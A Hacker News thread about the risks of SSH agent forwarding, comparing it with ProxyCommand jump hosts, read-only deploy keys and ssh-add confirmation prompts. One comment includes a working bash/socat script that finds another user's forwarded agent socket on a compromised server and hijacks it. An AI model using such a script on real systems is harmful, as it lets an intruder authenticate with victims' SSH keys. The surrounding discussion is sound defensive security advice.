Hacker News new | comments | show | ask | jobs | submit login
SSH Agent Forwarding considered harmful (heipei.github.io)
67 points by nodata 760 days ago | hide | past | web | 46 comments | favorite



It says so right in the man page:

"Agent forwarding should be enabled with caution. Users with the ability to bypass file permissions on the remote host (for the agent's UNIX-domain socket) can access the local agent through the forwarded connection. An attacker cannot obtain key material from the agent, however they can perform operations on the keys that enable them to authenticate using the identities loaded into the agent."

And it's not like this is buried in the manual. It says this in the section describing `-A`.


So true. But then again, based on the amount of comments this got both here and on Reddit, it seems like a lot of people were not aware of the danger or, even if aware, had not found a suitable replacement (like ProxyCommand could offer).


Indeed. This is far from being news and has been properly documented for many years.

I'm amazed at how people get far enough down the man-pages to understand what it does, how to enable it, but stop reading before these warnings.


One legitimate use case for agent forwarding that I've used in the past is ssh-ing in to a development server and doing a pull from a github repo. Without agent forwarding to authenticate from the dev server to github that gets really annoying really fast. Whatever vulnerabilities are introduced by agent forwarding they pale in comparison to those you get by leaving your private key on the dev server.


You can use read-only keys. Github has this, as do most other similar solutions.

> Whatever vulnerabilities are introduced by agent forwarding they pale in comparison to those you get by leaving your private key on the dev server.

Not really. "pale in comparison" is way off. Leaving the key on the server, and using agent forwarding are almost the same: anyone with access to the server has access to the key. There's only a minor difference in how hard it is for the attacker to get the key.


An alternative would be to create an independent key (I forget what Github calls them) that has read-only permissions to access your repo.


I didn't realize this when I first started using them, but Github's deploy keys are read/write as of the last time I tried them, with no option to make them read-only.

I actually used Bitbucket for a while because their repo-level keys are read-only.


This is only legitimate if you consider designing a system that requires this to be legitimate.

A simpler solution:

1) Use a "real" deployment mechanism, not an authenticated git pull from Github.

2) Write software to be easy to deploy. If you require a ton of external fiddly work to get the code running, that's what necessitates the use of a shared development server.


The whole point of deploying via a git pull is so that you don't have to do "a ton of external fiddly work" to get the code running. By deploying via a git pull I ensure that the files in the data center are exactly the same as the files on the laptop that I wrote the code on, and so if it worked on my laptop it is very likely to work in the datacenter.


Why can't you just authenticate to github with your password when you pull from the dev server?


Because then you are exposing your password to a potentially untrusted dev server? Unless you are making a new password for that server, in which case you are still better of by giving each server their own private key and registering the corresponding public keys for read-only access in your remote repo.

Another option: mount the corresponding directory of the dev server using sshfs, run git commands locally, run everything else remotely. Although I am not sure if there are any risks of mounting an untrusted directory via sshfs.



The point of ProxyCommand is that you don't have to leave your private key on the server..


Yes, obviously, but ProxyCommand won't work for this use case (AFAICT). I don't need to ssh from my home machine through my devhost to github, I need to execute a git comment on devhost that authenticates to github.


It can be password protected, though.


Yes, but then if I have to update 100 devhosts I have to type my password 100 times.


This could be automated. For example, both Ansible and Fabric allow you to enter your sudo password once (per run), and then it will enter it into the sudo prompt for you when executing remote commands. The same thing could be worked out for this (though I agree that it's a less flexible solution).


How is sudo supposed to help? I'm not trying to do anything that requires privileges on my machine, I'm trying to authenticate to github.


It's the same method. It uses something like expect to scrape the output of the commands, and determine that it needs to enter a password. That framework could be extended to do the same thing for git/ssh prompts on the remote machine. These tools don't currently do this, but I was just stating that it would be possible to enter the password once even when running this across multiple machines. Note that I'm not necessarily encouraging that as a solution.

For example, I know that one of them (probably Fabric) defines the sudo prompt (via the -p flag or SUDO_PROMPT environment variable) to be able to pick out a sudo prompt in the text output of the command, so that it knows it needs to respond with the password.


The problem with that is that then to automate it you need the password in cleartext in memory. A core dump, ptrace, or anything like that and you've just given up all access.


Something I cooked up a while ago:

    #!/bin/bash
    REMOTE_HOST=$1
    REMOTE_SSH_AUTH_SOCK=`ssh $REMOTE_HOST 'find /proc -maxdepth 2 -user \$USER -wholename */environ 2>/dev/null | xargs grep -zhm1 SSH_AUTH_SOCK 2>/dev/null' | tr '\0' '\n' | head -n1 | cut -d = -f 2`
    if [ -n "$REMOTE_SSH_AUTH_SOCK" ]
        then
            echo Found remote agent socket $REMOTE_SSH_AUTH_SOCK
            HIJACKED_SSH_AUTH_SOCK=/dev/shm/agentjack_$REMOTE_HOST
            socat UNIX-LISTEN:$HIJACKED_SSH_AUTH_SOCK,reuseaddr,fork EXEC:"'ssh -q $1 socat STDIO UNIX-CONNECT:$REMOTE_SSH_AUTH_SOCK'" &
            SOCAT_PID=$!
            export SSH_AUTH_SOCK=$HIJACKED_SSH_AUTH_SOCK
            bash
            kill $SOCAT_PID
    fi
This will connect to a server that you have somehow gained access to, find an agent socket, and reverse-forward the agent to the system you're connecting from. Depends on socat being installed on the server, though, which is somewhat uncommon.

I wrote a tool a while ago that automates using ssh jump hosts which may be of interest. https://github.com/ryancdotorg/ssh-chain


I also put together a reverse agent a few years ago: https://github.com/ewindisch/reverse-ssh-agent


Agent forwarding and ProxyCommand-style jumps are two different use cases; they both have uses which the other cannot be used for.

ProxyCommand is used for 'jump servers', where you want to simply login to one server behind another. Of course it's handy to be able to authenticate from your desktop to an additional server whenever possible and not leave yourself open to attack from some server in the middle. In fact, it becomes very handy to use an ssh agent in combination with ProxyCommand-style jumps.

Agent forwarding is used when you actually need different servers to interact with each other [and not your desktop] using credentials only you control. Rather than keeping credentials on the disks of intermediate servers, they stay on your desktop.

From an even more practical standpoint, agents allow you to copy files between servers without these stored credentials, too. Just try copying a couple terabytes of data from one server to another with your cable modem as the intermediary; it takes a lot longer than copying from server to server. Hence, agent forwarding to allow you to copy files from host A to B using the creds on your desktop. ProxyCommand doesn't do this.

Agent forwarding is always somewhat potentially harmful, but that potential can be limited a great deal. Of course the private keys (nor passwords) are never sent over the network. ssh-add -c allows you to be prompted before they're used (the author thought it was ssh-agent's option) and the -t option to both ssh-agent and ssh-add also allows you to expire the credentials after a given period of time.


How is ProxyCommand any better?

You still have to authenticate on the far remote server somehow, and the root user of the compromised middle machine can still MITM your entire negotiation because you have to trust their sshd and ssh commands.

How do you know they're not just rewriting your ProxyCommand?...


It's called secure shell for a reason. You know your ProxyCommand isn't tampered with because your ssh client has successfully matched the remote system key against your known_hosts file.


Looks like I slightly misunderstood how the command functioned, what with proxying the traffic back to your local ssh client.

I thought it was more like `ssh hosta 'ssh hostb'`, which would be problematic, but that's not the case. Phew.

So while non-secure protocols through ProxyCommand could still get MITM'd if they own hostA's sshd, proxying ssh itself would be fine, assuming you already had fingerprints. Much less worrisome. :)


Yeah, exactly, only your machine and the endpoint have to be secure for your application to be secure. I frequently run something like plain HTTP, netcat and other stuff over a ProxyCommand-initiated session.


Um, you realize that you're still relying on the mid-point SSHD to relay TCP packets without MITMing you though, right?

The only reason ProxyCommand to tunnel SSH would be safe is because your local SSH uses authentication, and you would get the freaky WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED, IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY! warning. (eg known_hosts)

Netcat and plain HTTP don't have an authentication layer, so if your proxy server is compromised, so is your plain traffic.

EDIT: see this other reply for another source: https://news.ycombinator.com/item?id=9428518


ProxyCommand is a command that runs locally on the system your connecting from. The only thing the potentially compromised middle machine is doing is forwarding a TCP connection.


Thanks, that explained my confusion. :)


Nothing new, more amazing is how apparently unknown this is. Also, there are risks the article doesn't acknowledge:

1) You should fear for your key just as much from local applications as you do from a remote machine. Yes, there is a great risk from remote system and agent forwarding, but do not become overly comfortable and presume these best practices do not also extend to your local machine.

2) You should always require ssh-askpass. You want to be prompted locally, otherwise malicious software on your machine could compromise your keyring. Needless to say, encrypt your key (have a passphrase).

3) You want to use 'ssh-add -x' to lock your keyring and prevent removal or addition of keys. Not only could this open you to various direct attacks, but the ssh-agent itself could potentially be a target for attack via buffer-overflow, double-free, etc. One trivial attack made possible by not using 'ssh-add -x' would be to flood the agent with keys forcing logins to fail with too-many-attempt errors.


The last paragraph about eavesdropping is interesting. The agent doesn't actually give out your key, so an attacker can't use your key to decrypt any traffic. Instead, the attacker gets at the decrypted data as it passes between two ssh processes. Agent forwarding requires the data to be decrypted on the compromised proxy machine. That's the security hole.

The data is encrypted between the workstation and the proxy machine A, which we'll assume is compromised. The receiving ssh process running on machine A decrypts the data and gives it to a second ssh process, which re-encrypts it and sends it to the destination machine B. Because it's getting decrypted on machine A, anybody who controls that machine can view or modify the data.

With a proxy command, there is only one ssh process running on the compromised machine and it never sees the decrypted data. All it's doing is forwarding a TCP connection. The second ssh process (the one connected to B) runs on your workstation. The data is encrypted on your workstation and sent to B, via the TCP tunnel running on A. But the data passing through A is encrypted using ephemeral keys that A doesn't have. In this situation, controlling A is no more useful than controlling any of the other internet routers or switches that your data is passing through.


A legitimate use case for forwarding your SSH agent is when you're working with a bunch of local VMs. I spin up several vagrant boxes that connect to different networks, and like to be able to log in to the VMs and have ssh-agent continue to let me do passwordless login to remote machines.

I suppose you could use ProxyCommand for stuff like this, but it interferes with the vagrant ssh syntax, and makes you go through the hassle of updating your SSH config, which doesn't scale very well.


Author here: Yes, that is one use-case I also consider in the post when I talk about using SSH Agent Forwarding into Linux namespaces. The same argument can be made about VMs, if you place the same trust in them as you do in your desktop.


A fun read in a similar vein: the mosh (https://mosh.mit.edu/) issue regarding adding support for SSH agent forwarding: https://github.com/keithw/mosh/issues/120


I see a lot of people demanding that mosh add a security hole because they don't know the secure way of doing what they want to do. (It's also quite possible that I'm just misunderstanding the whole thing.)

But it's pretty easy to see where the real problem is. I recently spent a few days trying to figure out how I could configure SSH to connect to one machine via a different machine. (This effort was a total failure.) I read the ssh_config man page. Here's the entry for ProxyCommand, which is apparently how you do this:

    ProxyCommand
      Specifies the command to use to connect to the server.  The com-
      mand string extends to the end of the line, and is executed using
      the user's shell `exec' directive to avoid a lingering shell
      process.

      In the command string, any occurrence of `%h' will be substituted
      by the host name to connect, `%p' by the port, and `%r' by the
      remote user name.  The command can be basically anything, and
      should read from its standard input and write to its standard
      output.  It should eventually connect an sshd(8) server running
      on some machine, or execute sshd -i somewhere.  Host key manage-
      ment will be done using the HostName of the host being connected
      (defaulting to the name typed by the user).  Setting the command
      to ``none'' disables this option entirely.  Note that CheckHostIP
      is not available for connects with a proxy command.

      This directive is useful in conjunction with nc(1) and its proxy
      support.  For example, the following directive would connect via
      an HTTP proxy at 192.0.2.0:

         ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
I think it's fair to say that this is completely incomprehensible. I've read it several times; I still can't say I understand any part of it (all right, I understand the bit about %h, %p, and %r substitutions). It doesn't surprise me at all that nobody uses ProxyCommand -- how are they supposed to know what it does, or how it's used?

I might also note that this "correct" solution involves telling ssh to execute the nc command on the middle machine, which is a weird bit of arcana to add to the process and makes it much harder to intuit independently. Ideally, I'd hope for a solution that lets me just supply credentials and information for the middle machine, and let ssh sort out how to get through it.


It occurs to me that all this would be much simpler/more elegant if ssh wasn't trying to be a dumb pipe, but instead something more like "tmux where some sessions can be remote".

* Both servers and clients would have an "SSH session-manager daemon" running.

* New terminals would preferably invoke just "ssh" as their shell, which would create a connection to the local SSH session-manager server—the same way people tend to use tmux under desktop Linux.

* The ssh(1) command would be able to talk to the session control channel of whatever session it's being run in, and say things like "hey SSH client, make a new session connected to this remote!" (Again like tmux.)

* The remote side would be running an SSH session-manager daemon too, so when you are in a session connected to hostA and you type "ssh hostB", the remote session manager daemon of hostA would set up a TCP-forwarding channel within itself, provide the new channel's ID over the control-channel back to the connected client, and the connected client would then create a new session connected to the TCP-forwarding channel.

Actually, now that I think about it, this is pretty much exactly like using Erlang's job control with remsh connections.


I appreciate SSH's ability to work as a dumb pipe. Tunnels are a boon to my life.

What I really, really want is for the SSH documentation to make sense even to people who don't already know what it means. If I know what I want to do, and SSH provides a way of doing that exact thing, I don't think it's too much to ask for the documentation to be good enough that I recognize the thing I want when I read about it. As things currently stand, the ProxyCommand documentation is only helpful at all if you already know all about ProxyCommand.


You could have both. Just like there's both ssh(1) and scp(1), you could have snc (heck, that probably already exists.)

But I don't see why SSH itself has to be constrained by being both a dumb pipe and a client/server shell system. Shells are complicated things, remote shells even moreso, and requiring them to also be able to serve as dumb pipes constrains the way you implement the shell stuff—it pokes a hole in the abstraction.

(If it were all up to me way back when, I'd have just cleaned up the TTY-device abstraction, merged it with PTTYs and serial consoles, made the whole thing socket-routable at the kernel level... and then pushed IPSec to ship with a very SSH-like auto-negotiated pairing protocol. We have the worst of a lot of worlds.)


You're right. This is a good idea.


The particularly annoying part is that nc or socat or whatever is not required in any relatively modern ssh.

My .ssh/config for use with a bastion or jump host:

  Host *.prod.blah.com
    ForwardAgent yes
    ProxyCommand ssh -W %h:%p %r@jumphost.ext.blah.com
 
  Host *.ext.blah.com
    ForwardAgent yes
It's all do-able within ssh-land. I do forward my agent, but only to hosts in my production sub-domains rather than to anyone I connect to. It could get hijacked, but at least the attack vector is a lot smaller.


ProxyCommand is simpler to setup if you have a new enough ssh that -W is available. You can do "ProxyCommand ssh gateway -W real_host:22" to go direct to real_host.


keeping track of which keys have been added to your local ssh-agent is a tedious task. SSH is very promiscuous when it comes to using SSH keys, and once you make use of another key it will happily add that to your current agent session.

I've only found this to be true with gnome-keyring's ssh-agent emulation (which isn't complete last time I checked, since it doesn't support -c) and the ssh-agent that OSX's keychain provides. They implicitly show keys added if they have known filenames in ~/.ssh (id_rsa, for example) in the output of `ssh-add -l`. To make matters worse, decrypting the key file puts the passphrase in the key chain, so even if you put as password on your ssh key, it's still accessible after you login and authenticate to the keychain service.

The ssh-agent that is distributed with openssh does not do this and requires keys to be added explicitly.


Are people only just realising this?

I would only ever use agent forwarding to a trusted host exactly because of what it does - put a socket on that host that responds with your SSH key... Anyone on that host with root has access to your key.


"This is like having unprotected sex only for a short amount of time. And sometimes you do"


Why not just require key use confirmation? ssh-add -c It's that easy.




Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | DMCA | Apply to YC | Contact

Search: